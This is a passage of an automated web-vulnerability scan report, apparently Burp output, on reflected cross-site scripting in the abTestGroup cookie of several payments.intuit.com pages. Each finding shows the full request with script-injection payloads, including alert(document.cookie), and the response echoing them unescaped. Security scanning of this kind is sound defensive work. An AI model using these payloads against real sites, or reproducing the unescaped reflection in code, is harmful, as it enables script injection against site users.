X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=mIzaMcgmXkKXC6HMobj9Sw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:34:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9598B0D0A0805192AA117E332415D03
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90433


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16880a1"><script>alert(1)</script>9e7870cf12f" type="hidden" />
...[SNIP]...

1.75. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4c4"><script>alert(1)</script>961eb3d32b2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T161e4c4"><script>alert(1)</script>961eb3d32b2;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:30 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=q5EsYaR2RRf6wEGsGNei3A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:31 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95A83170A0805192AA117E3BA132B36
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92671


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T161e4c4"><script>alert(1)</script>961eb3d32b2" type="hidden" />
...[SNIP]...

1.76. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload f2d55<script>alert(1)</script>c704fa6a9ea was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16f2d55<script>alert(1)</script>c704fa6a9ea;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rEDN5E1j6+Ozz1G2T5PZlw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C09510A0805192AA117E3D6AC554C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92658


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T16f2d55<script>alert(1)</script>c704fa6a9ea<br />
...[SNIP]...

1.77. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload d080e<script>alert(1)</script>76d20f74ae3 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d080e<script>alert(1)</script>76d20f74ae3;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:07 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=-gNeCUsgqZfnpruGmn+O1A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:08 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95DCFDA0A0805192AA117E330CD5480
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101826


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T16d080e<script>alert(1)</script>76d20f74ae3<br />
...[SNIP]...

1.78. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a8df"><script>alert(1)</script>8a97599db5e was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T163a8df"><script>alert(1)</script>8a97599db5e;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:12 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=CmnUcCtMpotVORb26tb9nw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:13 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C100A0A0805192AA117E3F608AB1B
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101839


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T163a8df"><script>alert(1)</script>8a97599db5e" type="hidden" />
...[SNIP]...

1.79. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe34"><script>alert(1)</script>e4428afd0e2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16dbe34"><script>alert(1)</script>e4428afd0e2;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=S54bRjiQv+uVCD7gvAdU-w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E93040A0805192AA117E381BE9E8D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134948


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<input id="testGroup" value="T16dbe34"><script>alert(1)</script>e4428afd0e2" type="hidden" />
...[SNIP]...

1.80. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload e5954<script>alert(1)</script>7c1b1f23a20 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16e5954<script>alert(1)</script>7c1b1f23a20;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:51 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=JTutGo4CW82kebKHmtahlQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:52 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96051670A0805192AA117E3B23F6A90
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134934


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<br />
       A/B Test Group: T16e5954<script>alert(1)</script>7c1b1f23a20<br />
...[SNIP]...

1.81. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/index.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 40826<script>alert(1)</script>6b3b3bfead2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1640826<script>alert(1)</script>6b3b3bfead2;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=JAU5jTsV01UQdVnkqg89xA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:56 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AE16F0A0805192AA117E34608F640
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92658


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T1640826<script>alert(1)</script>6b3b3bfead2<br />
...[SNIP]...

1.82. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [abTestGroup cookie]  previous  next

